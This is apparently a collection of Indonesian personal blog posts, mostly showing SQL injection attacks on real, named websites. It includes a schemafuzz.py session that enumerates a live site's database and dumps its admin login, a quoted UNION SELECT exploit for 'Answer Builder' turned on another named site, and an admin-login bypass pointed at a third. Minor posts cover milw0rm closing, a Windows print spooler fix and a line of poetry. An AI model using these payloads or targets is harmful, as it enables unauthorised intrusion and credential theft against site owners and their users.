- Pray Times! 1.1.3, download disini
- Kaskus Menu 2.5.2, download disini
- Adblock Plus 1.1, download disini
- DownThemAll 1.1.4, download disini
- HackBar 1.4.2, download disini

Dengan merujuk ke website milw0rm, maka gue menemukan salah satu target dengan alamat website www.letsdancedisco.de/apbook/index.php lalu ubah menjadi www.letsdancedisco.de/apbook/admin/index.php, kemudian isi username & password dg teknik sql Injection tsb. Maka anda telah menjadi admin

Masih banyak lagi target yg bisa di inject :D

Software:
- OS Windos
- Browser mozilla
- Python 2.5 (download disini)
- Schemafuzz.py (download disini)

Target : http://justclone.com/alibabaclone/category.php?IndustryID=44

POC:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --findcol -u http://justclone.com/alibabaclone/category.php?IndustryID=44--

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44--
[+] Evasion Used: "+" "--"
[+] 13:31:32
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,
[+] Column Length is: 2
[+] Found null column at column #: 1
[+] SQLi URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1--
[+] darkc0de URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de
[-] Done!

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

C:\Python25>schemafuzz.py --dbs -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:34:31
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0]justclo_alibaba

[-] [13:34:35]
[-] Total URL Requests 3
[-] Done

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

C:\Python25>schemafuzz.py --schema -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:37:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing Tables & Columns from database "justclo_alibaba"
[+] Number of Tables: 60

[Database]: justclo_alibaba
[Table: Columns]
[0]admin:

LoginID,Password,AdminEmail,AdminEmailPassword,smtp,ScriptName,url,smtpstatus,port,Title,nochex,twoco,paypal,goldmemberfee
[1]all_leads: AllLeadsID,LeadID,LeadType,leadstatus,LeadAddedDate
[2]buyer: BuyerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,featured
[3]buyer_blogs: BuyerBlogID,BlogTitle,BlogStatus,Blog,BuyerID,BlogAddedDate
[4]buyer_leads:
BuyerLeadID,BuyerID,Subject,ProductKeyword,MoreKeywords,CategoryID,Details,Quantity,Packaging,ValidDates,PurchaseType,ProductPhoto,thumb1,thumb2,AddedDate,ExpiryDate,ExpireAfter,buyingleadstatus
[5]buyer_messages:
BuyerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[6]buyer_profile:
BuyerProfileID,BuyerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,bigbuyer,DateAdded
[7]buyer_video: BuyerVideoID,BuyerID,video,AddedDate
[8]buyercomments: CommentID,Comment,BuyerID,Rating,CommentBy,Status,AddedDate
[9]categories: CategoryID,IndustryID,Category
[10]contactus: contactus,note
[11]countries: CountryID,Country
[12]countries_show: CountryShowID,Country,Logo,LogoThumb,AddedDate
[13]industry: IndustryID,Industry
[14]news: NewsID,Title,Details,AddedDate,hot
[15]newsletter_subscribers: id,email,ConfirmationCode,status,AddedDate
[16]partner_sites: PartnerSiteID,logo,url,AddedDate
[17]phpbb_auth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[18]phpbb_banlist: ban_id,ban_userid,ban_ip,ban_email
[19]phpbb_categories: cat_id,cat_title,cat_order
[20]phpbb_config: config_name,config_value
[21]phpbb_confirm: confirm_id,session_id,code
[22]phpbb_disallow: disallow_id,disallow_username
[23]phpbb_forum_prune: prune_id,forum_id,prune_days,prune_freq
[24]phpbb_forums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[25]phpbb_groups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[26]phpbb_posts:
post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[27]phpbb_posts_text: post_id,bbcode_uid,post_subject,post_text
[28]phpbb_privmsgs:
privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[29]phpbb_privmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[30]phpbb_ranks: rank_id,rank_title,rank_min,rank_special,rank_image
[31]phpbb_search_results: search_id,session_id,search_time,search_array
[32]phpbb_search_wordlist: word_text,word_id,word_common
[33]phpbb_search_wordmatch: post_id,word_id,title_match
[34]phpbb_sessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[35]phpbb_sessions_keys: key_id,user_id,last_ip,last_login
[36]phpbb_smilies: smilies_id,code,smile_url,emoticon
[37]phpbb_themes:
themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[38]phpbb_themes_name:
themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[39]phpbb_topics:
topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[40]phpbb_topics_watch: topic_id,user_id,notify_status
[41]phpbb_user_group: group_id,user_id,user_pending
[42]phpbb_users:
user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[43]phpbb_vote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[44]phpbb_vote_results: vote_id,vote_option_id,vote_option_text,vote_result
[45]phpbb_vote_voters: vote_id,vote_user_id,vote_user_ip
[46]phpbb_words: word_id,word,replacement
[47]products:
ProductID,SellerID,ProductPhoto,ProductPhoto2,ProductPhoto3,ProductPhoto4,thumb1,thumb2,thumb3,thumb1_2,thumb1_3,thumb1_4,thumb2_2,thumb2_3,thumb2_4,thumb3_2,thumb3_3,thumb3_4,ProductName,ModelNo,ProductKeyword,CategoryID,ProductDescription,PlaceOfOrigin,BrandName,PriceTerms,Price,Packing,PaymentTerms,DeliveryTime,MinimumOrders,SupplyAbility,QualityCertification,AddedDate,productstatus,viewcounter,featured
[48]rightbanners: id,CategoryID,Banner,page,link,BannerNumber,AddedDate
[49]seller:
SellerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,MemberSince,Gold,featured
[50]seller_blogs: SellerBlogID,BlogTitle,BlogStatus,Blog,SellerID,BlogAddedDate
[51]seller_categories: SellerCategoryID,SellerID,CategoryID
[52]seller_messages:
SellerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[53]seller_profile:
SellerProfileID,SellerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,DateAdded
[54]seller_video: SellerVideoID,SellerID,video,AddedDate
[55]sellercomments: CommentID,Comment,SellerID,Rating,CommentBy,Status,AddedDate
[56]selling_leads:
SellingLeadID,Subject,ProductPhoto,thumb1,thumb2,BriefDescription,DetailedDescription,Keyword,CategoryID,SellerID,AddedDate,ExpiryDate,ExpireAfter,sellingleadstatus,featured
[57]success_stories: SuccessStoryID,Title,Name,Thumb,Details,AddedDate
[58]topbanners: id,SubCategoryID,Banner,page,link,CategoryID,AddedDate
[59]trade_shows: TradeShowID,Name,Logo,LogoThumb,StartDate,EndDate,Address,OpenTime,url,AddedDate

[-] [13:49:10]
[-] Total URL Requests 580
[-] Done

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

C:\Python25>schemafuzz.py --dump -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba -T admin -C LoginID,Password

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:03:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Dumping data from database "justclo_alibaba" Table "admin"
[+] Column(s) ['LoginID', 'Password']
[+] Number of Rows: 1

[0] admin:admin123:admin123:

[-] [14:03:15]
[-] Total URL Requests 3
[-] Done

Mungkin para fans berat milw0rm (termasuk gue sendiri :)) sudah banyak yang mengetahui bahwa milw0rm dinyatakan akan ditutup. Alasannya mungkin bisa dilihat dari berita ini, walaupun beberapa rumor banyak yang beredar bahwa ada alasan lain dibalik semua ini yang mengharuskan str0ke menutup milw0rm. Namun dari twitter-nya str0ke sepertinya akan ada angin baik mengenai milw0rm, we’ll see.

Mungkin sudah saatnya mencari alternatif lain?!packetstormsecurity atau securityfocus masih tetap memberikan archive exploits, tools, serta POC tiap bulannya, atau mungkin sudah saatnya situs ini mendapatkan lebih banyak hits terutama bagi mereka yang merindukan suasana milw0rm.

sumber:
- Kecoak elektronik

Iseng jalan² ke Jatim dapet oleh² :

AUTHOR: t0pP8uZz & xprog
SITE: N/A DORK: intitle:"Answer Builder"  Ask a question
DESCRIPTION:
pull out admin user/pass from the database
EXPLOITS:
http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/ you can backup DB there.

Lalu gw coba cari kutunya disini dengan memasukkan dork-nya, beberapa detik kemudian dapet 1 website yg keliatannya bisa di injek siqil. Nih dia webnya http://www.rotorheads.co.uk/index.php?cmd=4&id=1. Sesuai dengan petunjuk diatas, lalu gw tambahin menjadi:

http://www.rotorheads.co.uk/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat%280x3c623e,username,0x3a,password,0x3c623e%29,9,10,11,12,13,14,15/**/FROM/**/admin/*

Can you see the password? :)

Tiba² list di printer & faxes ilang pada saat mau ngeprint. Kenapa ya? Gue coba nge-add ulang printer di jaringan kantor tapi ga bisa malah muncul error "Operation could not be completed", hm... kenapa nih? Gue coba restore OS Windos XP gagal. Gue coba tanya ke paman googel, akhirnya dapet jawaban. Lets try,

cara pertamax:
- klik Start, masuk run
- ketik "net start spooler". Tanpa tanda petik

atau cara keduax:
- Klik Start, dan klik Control Panel.
- Double-click Administrative Tools, kemudian klik Services.
- Double-click Printer Spooler service, kemudian ubah tipe startup ke Automatic. Hal ini akan menjadikan service Spooler start secara otomatis pada saat komputer restart.

sumber: Microsoft

Entah kenapa gue pengen nulis kalimat ini:

Kuhapus air mata dalam duka, Kupejamkan mata dalam duka, Kuhempaskan raga dalam elegi cintamu, dan Kurentangkan jiwa dalam sukma keabadian..